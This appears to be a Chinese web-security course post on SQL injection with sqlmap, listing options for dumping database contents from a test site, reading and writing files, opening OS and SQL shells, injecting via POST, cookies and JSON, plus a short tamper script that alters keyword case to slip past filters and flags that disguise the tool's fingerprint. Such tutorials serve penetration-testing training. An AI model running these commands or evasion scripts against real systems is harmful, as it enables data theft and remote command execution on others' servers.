sql注入五-WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构


演示案例:

  • 数据猜解-库表列数据&字典
  • 权限操作-文件&命令&交互式
  • 提交方法-POST&HEAD&JSON
  • 绕过模块-Tamper脚本-使用&开发
  • 分析拓展-代理&调试&指纹&风险&等级
复制代码
#参考:`
`https://www.cnblogs.com/bmjoker/p/9326258.html`

`#数据猜解-库表列数据&字典`
`测试:http://vulnweb.com/`
`--current-db`
`--tables -D ""`
`--columns -T ""` `-D ""`
`--dump -C ""` `-C ""` `-T ""`

`#权限操作-文件&命令&交互式`
`测试:MYSQL高权限注入`
`引出权限:`
`--is-dba --privileges`
`引出文件:`
`--file-read --file-write --file-dest `
`引出命令:`
`--os-cmd=` `--os-shell --sql-shell`

`#提交方法-POST&HEAD&JSON`
`测试:Post Cookie Json`
`--data ""`
`--cookie ""`
`-r 1.txt`

`#绕过模块-Tamper脚本-使用&开发`
`测试:base64注入 有过滤的注入`
`--tamper=base64encode.py`
`--tamper=test.py`
`from lib.core.enums import PRIORITY`

`__priority__ = PRIORITY.LOW`

`def` `dependencies():`
    `pass`

`def` `tamper(payload,` `**kwargs):`
    `if payload:`      
`        payload = payload.replace('SELECT','sElEct')`
`        payload = payload.replace('OR','Or')`
`        payload = payload.replace('AND','And')`
`        payload = payload.replace('SLEEP','SleeP')`
`        payload = payload.replace('ELT','Elt')`
    `return payload`


`#分析拓展-代理&调试&指纹&风险&等级`
`1、后期分析调试:`
`-v=(0-6)`  `#详细的等级(0-6)`
`--proxy "http://xx:xx"` `#代理注入`

`2、打乱默认指纹:`
`--user-agent ""`  `#自定义user-agent`
`--random-agent   #随机user-agent`
`--time-sec=(2,5)` `#延迟响应,默认为5`

`3、使用更多的测试:测试Header注入`
`--level=(1-5)` `#要执行的测试水平等级,默认为1 `
`--risk=(0-3)`  `#测试执行的风险等级,默认为1 `
`

涉及资源:

补充:涉及录像课件资源软件包资料等下载地址

相关推荐
枷锁—sha3 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1195 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20257 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec7 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用8 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~8 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian8 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元9 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
Whoami!9 小时前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权
虚构之人1 天前
二进制漏洞挖掘(WinAFL Fuzzing)Windows篇
汇编·网络安全·信息安全·系统安全